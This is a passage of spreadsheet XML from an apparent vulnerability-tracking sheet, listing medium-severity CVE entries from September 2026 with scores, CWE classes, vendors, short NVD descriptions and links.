t="inlineStr"><is><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is></c><c r="T1185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t></is></c></row><row r="1186"><c r="A1186" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1186" s="5" t="inlineStr"><is><t>CVE-2026-63523</t></is></c><c r="D1186" s="5" t="n"><v>6.1</v></c><c r="E1186" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1186" s="5" t="inlineStr" /><c r="H1186" s="5" t="n"><v>0.007</v></c><c r="I1186" s="5" t="inlineStr" /><c r="J1186" s="5" t="inlineStr" /><c r="K1186" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1186" s="5" t="inlineStr" /><c r="M1186" s="5" t="inlineStr" /><c r="N1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1186" s="5" t="inlineStr" /><c r="R1186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1186" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t></is></c></row><row r="1187"><c r="A1187" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1187" s="5" t="inlineStr"><is><t>CVE-2026-69642</t></is></c><c r="D1187" s="5" t="n"><v>6.1</v></c><c r="E1187" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1187" s="5" t="inlineStr" /><c r="H1187" s="5" t="n"><v>0.003</v></c><c r="I1187" s="5" t="inlineStr" /><c r="J1187" s="5" t="inlineStr" /><c r="K1187" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1187" s="5" t="inlineStr" /><c r="M1187" s="5" t="inlineStr" /><c r="N1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1187" s="5" t="inlineStr" /><c r="R1187" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1187" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t></is></c></row><row r="1188"><c r="A1188" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1188" s="5" t="inlineStr"><is><t>CVE-2026-76002</t></is></c><c r="D1188" s="5" t="n"><v>6.1</v></c><c r="E1188" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1188" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1188" s="5" t="inlineStr" /><c r="H1188" s="5" t="n"><v>0.007</v></c><c r="I1188" s="5" t="inlineStr" /><c r="J1188" s="5" t="inlineStr" /><c r="K1188" s="5" t="inlineStr" /><c r="L1188" s="5" t="inlineStr" /><c r="M1188" s="5" t="inlineStr" /><c r="N1188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1188" s="5" t="inlineStr" /><c r="R1188" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1188" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t></is></c><c r="T1188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t></is></c></row><row r="1189"><c r="A1189" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1189" s="5" t="inlineStr"><is><t>CVE-2026-77654</t></is></c><c r="D1189" s="5" t="n"><v>6.1</v></c><c r="E1189" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1189" s="5" t="inlineStr"><is><t>security.vulnerabilities@algosec.com</t></is></c><c r="G1189" s="5" t="inlineStr" /><c r="H1189" s="5" t="n"><v>0.001</v></c><c r="I1189" s="5" t="inlineStr" /><c r="J1189" s="5" t="inlineStr" /><c r="K1189" s="5" t="inlineStr" /><c r="L1189" s="5" t="inlineStr" /><c r="M1189" s="5" t="inlineStr" /><c r="N1189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1189" s="5" t="inlineStr" /><c r="R1189" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1189" s="5" t="inlineStr"><is><t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.

A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 


This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t></is></c><c r="T1189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t></is></c></row><row r="1190"><c r="A1190" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1190" s="5" t="inlineStr"><is><t>CVE-2026-78738</t></is></c><c r="D1190" s="5" t="n"><v>6.1</v></c><c r="E1190" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1190" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1190" s="5" t="inlineStr" /><c r="H1190" s="5" t="n"><v>0.002</v></c><c r="I1190" s="5" t="inlineStr" /><c r="J1190" s="5" t="inlineStr" /><c r="K1190" s="5" t="inlineStr" /><c r="L1190" s="5" t="inlineStr" /><c r="M1190" s="5" t="inlineStr" /><c r="N1190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1190" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1190" s="5" t="inlineStr" /><c r="R1190" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1190" s="5" t="inlineStr"><is><t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t></is></c><c r="T1190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t></is></c></row><row r="1191"><c r="A1191" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1191" s="5" t="inlineStr"><is><t>CVE-2026-78741</t></is></c><c r="D1191" s="5" t="n"><v>6.1</v></c><c r="E1191" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1191" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1191" s="5" t="inlineStr" /><c r="H1191" s="5" t="n"><v>0.002</v></c><c r="I1191" s="5" t="inlineStr" /><c r="J1191" s="5" t="inlineStr" /><c r="K1191" s="5" t="inlineStr" /><c r="L1191" s="5" t="inlineStr" /><c r="M1191" s="5" t="inlineStr" /><c r="N1191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1191" s="5" t="inlineStr" /><c r="R1191" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1191" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t></is></c><c r="T1191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t></is></c></row><row r="1192"><c r="A1192" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1192" s="5" t="inlineStr"><is><t>CVE-2026-78742</t></is></c><c r="D1192" s="5" t="n"><v>6.1</v></c><c r="E1192" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1192" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1192" s="5" t="inlineStr" /><c r="H1192" s="5" t="n"><v>0.002</v></c><c r="I1192" s="5" t="inlineStr" /><c r="J1192" s="5" t="inlineStr" /><c r="K1192" s="5" t="inlineStr" /><c r="L1192" s="5" t="inlineStr" /><c r="M1192" s="5" t="inlineStr" /><c r="N1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1192" s="5" t="inlineStr" /><c r="R1192" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1192" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t></is></c><c r="T1192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t></is></c></row><row r="1193"><c r="A1193" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1193" s="5" t="inlineStr"><is><t>CVE-2026-85484</t></is></c><c r="D1193" s="5" t="n"><v>6.1</v></c><c r="E1193" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1193" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1193" s="5" t="inlineStr" /><c r="H1193" s="5" t="n"><v>0.003</v></c><c r="I1193" s="5" t="inlineStr" /><c r="J1193" s="5" t="inlineStr" /><c r="K1193" s="5" t="inlineStr" /><c r="L1193" s="5" t="inlineStr" /><c r="M1193" s="5" t="inlineStr" /><c r="N1193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1193" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1193" s="5" t="inlineStr" /><c r="R1193" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1193" s="5" t="inlineStr"><is><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is></c><c r="T1193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t></is></c></row><row r="1194"><c r="A1194" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1194" s="5" t="inlineStr"><is><t>CVE-2026-85485</t></is></c><c r="D1194" s="5" t="n"><v>6.1</v></c><c r="E1194" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1194" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1194" s="5" t="inlineStr" /><c r="H1194" s="5" t="n"><v>0.002</v></c><c r="I1194" s="5" t="inlineStr" /><c r="J1194" s="5" t="inlineStr" /><c r="K1194" s="5" t="inlineStr" /><c r="L1194" s="5" t="inlineStr" /><c r="M1194" s="5" t="inlineStr" /><c r="N1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1194" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1194" s="5" t="inlineStr" /><c r="R1194" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1194" s="5" t="inlineStr"><is><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is></c><c r="T1194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t></is></c></row><row r="1195"><c r="A1195" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1195" s="5" t="inlineStr"><is><t>CVE-2026-85630</t></is></c><c r="D1195" s="5" t="n"><v>6.1</v></c><c r="E1195" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1195" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1195" s="5" t="inlineStr" /><c r="H1195" s="5" t="n"><v>0.003</v></c><c r="I1195" s="5" t="inlineStr" /><c r="J1195" s="5" t="inlineStr" /><c r="K1195" s="5" t="inlineStr" /><c r="L1195" s="5" t="inlineStr" /><c r="M1195" s="5" t="inlineStr" /><c r="N1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1195" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1195" s="5" t="inlineStr" /><c r="R1195" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1195" s="5" t="inlineStr"><is><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is></c><c r="T1195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t></is></c></row><row r="1196"><c r="A1196" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1196" s="5" t="inlineStr"><is><t>CVE-2026-56101</t></is></c><c r="D1196" s="5" t="n"><v>6</v></c><c r="E1196" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1196" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1196" s="5" t="inlineStr" /><c r="H1196" s="5" t="n"><v>0.004</v></c><c r="I1196" s="5" t="inlineStr" /><c r="J1196" s="5" t="inlineStr" /><c r="K1196" s="5" t="inlineStr" /><c r="L1196" s="5" t="inlineStr" /><c r="M1196" s="5" t="inlineStr" /><c r="N1196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1196" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1196" s="5" t="inlineStr" /><c r="R1196" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S1196" s="5" t="inlineStr"><is><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is></c><c r="T1196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t></is></c></row><row r="1197"><c r="A1197" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1197" s="5" t="inlineStr"><is><t>CVE-2026-78216</t></is></c><c r="D1197" s="5" t="n"><v>6</v></c><c r="E1197" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1197" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1197" s="5" t="inlineStr" /><c r="H1197" s="5" t="n"><v>0.002</v></c><c r="I1197" s="5" t="inlineStr" /><c r="J1197" s="5" t="inlineStr" /><c r="K1197" s="5" t="inlineStr" /><c r="L1197" s="5" t="inlineStr" /><c r="M1197" s="5" t="inlineStr" /><c r="N1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1197" s="5" t="inlineStr" /><c r="R1197" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1197" s="5" t="inlineStr"><is><t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_lua: from 0.1.0 before 0.2.2.</t></is></c><c r="T1197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t></is></c></row><row r="1198"><c r="A1198" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1198" s="5" t="inlineStr"><is><t>CVE-2026-78230</t></is></c><c r="D1198" s="5" t="n"><v>6</v></c><c r="E1198" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1198" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1198" s="5" t="inlineStr" /><c r="H1198" s="5" t="n"><v>0.002</v></c><c r="I1198" s="5" t="inlineStr" /><c r="J1198" s="5" t="inlineStr" /><c r="K1198" s="5" t="inlineStr" /><c r="L1198" s="5" t="inlineStr" /><c r="M1198" s="5" t="inlineStr" /><c r="N1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1198" s="5" t="inlineStr" /><c r="R1198" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1198" s="5" t="inlineStr"><is><t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_ai: from 0.1.0 before 1.0.3.</t></is></c><c r="T1198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t></is></c></row><row r="1199"><c r="A1199" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1199" s="5" t="inlineStr"><is><t>CVE-2026-78552</t></is></c><c r="D1199" s="5" t="n"><v>6</v></c><c r="E1199" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1199" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1199" s="5" t="inlineStr" /><c r="H1199" s="5" t="n"><v>0.003</v></c><c r="I1199" s="5" t="inlineStr" /><c r="J1199" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1199" s="5" t="inlineStr" /><c r="L1199" s="5" t="inlineStr" /><c r="M1199" s="5" t="inlineStr" /><c r="N1199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1199" s="5" t="inlineStr" /><c r="R1199" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1199" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t></is></c><c r="T1199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t></is></c></row><row r="1200"><c r="A1200" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1200" s="5" t="inlineStr"><is><t>CVE-2026-78622</t></is></c><c r="D1200" s="5" t="n"><v>6</v></c><c r="E1200" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1200" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1200" s="5" t="inlineStr" /><c r="H1200" s="5" t="n"><v>0.001</v></c><c r="I1200" s="5" t="inlineStr" /><c r="J1200" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1200" s="5" t="inlineStr" /><c r="L1200" s="5" t="inlineStr" /><c r="M1200" s="5" t="inlineStr" /><c r="N1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1200" s="5" t="inlineStr" /><c r="R1200" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1200" s="5" t="inlineStr"><is><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is></c><c r="T1200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t></is></c></row><row r="1201"><c r="A1201" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1201" s="5" t="inlineStr"><is><t>CVE-2026-82056</t></is></c><c r="D1201" s="5" t="n"><v>6</v></c><c r="E1201" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1201" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1201" s="5" t="inlineStr" /><c r="H1201" s="5" t="n"><v>0.002</v></c><c r="I1201" s="5" t="inlineStr" /><c r="J1201" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1201" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1201" s="5" t="inlineStr" /><c r="M1201" s="5" t="inlineStr" /><c r="N1201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1201" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1201" s="5" t="inlineStr" /><c r="R1201" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1201" s="5" t="inlineStr"><is><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is></c><c r="T1201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t></is></c></row><row r="1202"><c r="A1202" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1202" s="5" t="inlineStr"><is><t>CVE-2026-82063</t></is></c><c r="D1202" s="5" t="n"><v>6</v></c><c r="E1202" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1202" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1202" s="5" t="inlineStr" /><c r="H1202" s="5" t="n"><v>0.003</v></c><c r="I1202" s="5" t="inlineStr" /><c r="J1202" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1202" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1202" s="5" t="inlineStr" /><c r="M1202" s="5" t="inlineStr" /><c r="N1202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1202" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1202" s="5" t="inlineStr" /><c r="R1202" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1202" s="5" t="inlineStr"><is><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is></c><c r="T1202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t></is></c></row><row r="1203"><c r="A1203" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1203" s="5" t="inlineStr"><is><t>CVE-2026-16004</t></is></c><c r="D1203" s="5" t="n"><v>5.9</v></c><c r="E1203" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1203" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1203" s="5" t="inlineStr" /><c r="H1203" s="5" t="n"><v>0.001</v></c><c r="I1203" s="5" t="inlineStr" /><c r="J1203" s="5" t="inlineStr" /><c r="K1203" s="5" t="inlineStr" /><c r="L1203" s="5" t="inlineStr" /><c r="M1203" s="5" t="inlineStr" /><c r="N1203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1203" s="5" t="inlineStr" /><c r="R1203" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1203" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t></is></c></row><row r="1204"><c r="A1204" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1204" s="5" t="inlineStr"><is><t>CVE-2026-69304</t></is></c><c r="D1204" s="5" t="n"><v>5.9</v></c><c r="E1204" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1204" s="5" t="inlineStr" /><c r="H1204" s="5" t="n"><v>0.008</v></c><c r="I1204" s="5" t="inlineStr" /><c r="J1204" s="5" t="inlineStr" /><c r="K1204" s="5" t="inlineStr" /><c r="L1204" s="5" t="inlineStr" /><c r="M1204" s="5" t="inlineStr" /><c r="N1204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1204" s="5" t="inlineStr" /><c r="R1204" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="S1204" s="5" t="inlineStr"><is><t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t></is></c></row><row r="1205"><c r="A1205" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1205" s="5" t="inlineStr"><is><t>CVE-2026-69382</t></is></c><c r="D1205" s="5" t="n"><v>5.9</v></c><c r="E1205" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1205" s="5" t="inlineStr" /><c r="H1205" s="5" t="n"><v>0.004</v></c><c r="I1205" s="5" t="inlineStr" /><c r="J1205" s="5" t="inlineStr" /><c r="K1205" s="5" t="inlineStr" /><c r="L1205" s="5" t="inlineStr" /><c r="M1205" s="5" t="inlineStr" /><c r="N1205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1205" s="5" t="inlineStr" /><c r="R1205" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S1205" s="5" t="inlineStr"><is><t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t></is></c></row><row r="1206"><c r="A1206" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1206" s="5" t="inlineStr"><is><t>CVE-2026-70091</t></is></c><c r="D1206" s="5" t="n"><v>5.9</v></c><c r="E1206" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1206" s="5" t="inlineStr" /><c r="H1206" s="5" t="n"><v>0.007</v></c><c r="I1206" s="5" t="inlineStr" /><c r="J1206" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1206" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1206" s="5" t="inlineStr" /><c 